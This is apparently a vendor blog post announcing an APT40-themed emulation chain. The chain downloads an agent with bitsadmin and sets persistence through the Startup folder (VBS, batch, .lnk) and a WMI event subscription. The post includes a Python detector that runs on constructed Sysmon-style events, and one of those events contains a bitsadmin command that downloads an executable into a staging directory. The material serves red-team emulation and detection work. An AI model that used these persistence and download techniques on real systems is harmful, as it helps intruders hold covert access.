APT40 maritime industry
Bitsadmin.exe is a native Windows binary that can be used to download files. This chain downloads a Pneuma agent from Operator using Bitsadmin.exe and configures agent persistence through use of autoruns techniques. These techniques require a privileged agent running as Administrator.

TTP Tuesday: APT40 - Maritime Industry

Emulating APT40's malware persistence techniques

Theme Overview

Our last release looked at APT40 targeting the defense industry with multi-stage Office documents to gain initial access.

For this week’s TTP Tuesday we are releasing a new APT40 themed chain based on persistence techniques used while targeting the maritime industry. Rather than persisting malware used by APT40 during their maritime-related targeting, each technique in this week’s chain will enable you to persist and spawn a new Pneuma session.

BITSAdmin

BITSAdmin is a Microsoft tool for managing the Background Intelligent Transfer Service (BITS), which is used to download or upload files from HTTP servers, SMB shares, and Windows updates. BITSAdmin is notable because an attacker may use this signed binary to download payloads, or even execute code, and potentially evade detection or prevention. More information on BITSAdmin abuse can be found on the LOLBAS project.

This week’s release contains a technique that uses BITSadmin to download a Pneuma agent from Operator and place it in a staging directory.

Windows Startup

The Windows Startup folder is used to launch applications and open documents automatically at Windows Startup. APT40 placed Windows Shortcuts (.lnk files) in the Startup folder to execute malware.

We’re releasing two methods of Startup persistence in this week’s chain: execution of a VBScript to download and run a Pneuma agent, and a .lnk file that executes a Pneuma agent from a staging directory.

As an added bonus, this week’s chain includes a WMI event subscription technique to start a new Pneuma session from a staging directory. Where our previous WMI persistence technique was used to execute disarmed malware, this week you’ll be able to spawn a new agent session back to Operator.
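
On the detection side, each technique above leaves a distinct trace: a bitsadmin.exe process with a transfer verb, a script or shortcut written to a Startup folder, and a WMI consumer pointing into the staging directory. The following is an added example, not part of the Prelude chain or the original post. It classifies constructed, Sysmon-style events; the simplified field layout, file names and the 192.0.2.10 address are assumptions, while C:\Perflogs is the chain's default staging_dir.

```python
import re

STAGING_DIR = r"c:\perflogs"  # the chain's default staging_dir, lower-cased
# Matches both the per-user (%APPDATA%) and all-users (%ProgramData%) Startup folders.
STARTUP = r"\microsoft\windows\start menu\programs\startup" + "\\"
SCRIPT_EXT = (".lnk", ".vbs", ".bat")
BITS_VERBS = re.compile(r"/(transfer|addfile|setnotifycmdline)\b", re.I)

def classify(event):
    """Return a finding label for one event dict, or None if nothing matches."""
    eid = event.get("EventID")
    if eid == 1:  # Sysmon process creation
        image = event.get("Image", "").lower()
        cmd = event.get("CommandLine", "")
        if image.endswith("\\bitsadmin.exe") and BITS_VERBS.search(cmd):
            where = "staging" if STAGING_DIR in cmd.lower() else "other"
            return f"bitsadmin-download:{where}"
    elif eid == 11:  # Sysmon file creation
        target = event.get("TargetFilename", "").lower()
        if STARTUP in target and target.endswith(SCRIPT_EXT):
            return "startup-folder-drop"
    elif eid == 20:  # Sysmon WMI event consumer registration
        if STAGING_DIR in event.get("Destination", "").lower():
            return "wmi-consumer-runs-from-staging"
    return None

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 http://192.0.2.10/agent.exe C:\Perflogs\agent.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list /allusers"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
    {"EventID": 20, "Name": "ExampleConsumer", "Type": "Command Line",
     "Destination": r"C:\Perflogs\agent.exe"},
]

def findings(events):
    """Classify every event, keeping order so results line up with the input."""
    return [classify(e) for e in events]

if __name__ == "__main__":
    for e, f in zip(SAMPLE_EVENTS, findings(SAMPLE_EVENTS)):
        detail = e.get("CommandLine") or e.get("TargetFilename") or e.get("Destination")
        print(f or "no-match", "<-", detail)
```

The staging-directory match is only as good as the configured path, so set STAGING_DIR to whatever value the chain's staging_dir variable was given.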

Thanks for reading! We’ll be back next week with more examples of APT40 tradecraft!

Check it out on the Prelude chains website.

Watch a demonstration: APT40 Maritime Industry

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: privateducky
Alex: khyberspache
Kris: Xanthonus
Octavia: VV_X_7
Sam: wasupwithuman

Source: https://feed.prelude.org

Execute this chain

Download Operator (1.7.0)
Learn about Operator

TTPs

Download Pneuma agent using BITSAdmin
Install agent persistence via StartUp VBS file
Install agent persistence via StartUp batch file
Install agent persistence via WMI event subscription
Install agent persistence via .LNK file

User-Set Custom Variables

  • staging_dir: C:\Perflogs